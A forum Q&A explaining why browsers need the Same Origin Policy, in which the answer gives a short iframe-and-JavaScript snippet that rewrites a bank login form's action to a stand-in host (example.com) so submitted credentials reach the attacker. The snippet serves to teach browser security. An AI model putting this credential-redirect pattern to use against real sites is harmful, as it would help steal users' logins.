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security - Simple example for why Same Origin Policy is needed

I've read about Same Origin Policy, but for a better understanding of the matter: could anyone please write a simple code (in any language) that will demonstrate an attack that SOP stops?

How was it possible to attack someone before SOP came about?

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<iframe id="bank" src="https://yourbank.com"></iframe>

<script>
    window.onload = function() {
        document.getElementById('bank').contentWindow.document.forms[0].action =
            'http://example.com';
    };
</script>

The Javascript code changes the form's action property (the destination, in a matter of speaking), so when you submit the form, you send your credentials to me, not your bank.

If I set up a PHP script on my server that redirects you to your bank, you won't even notice it.

With Same Origin Policy, this attack isn't possible. A site on my domain cannot read or modify the contents of the bank's website.


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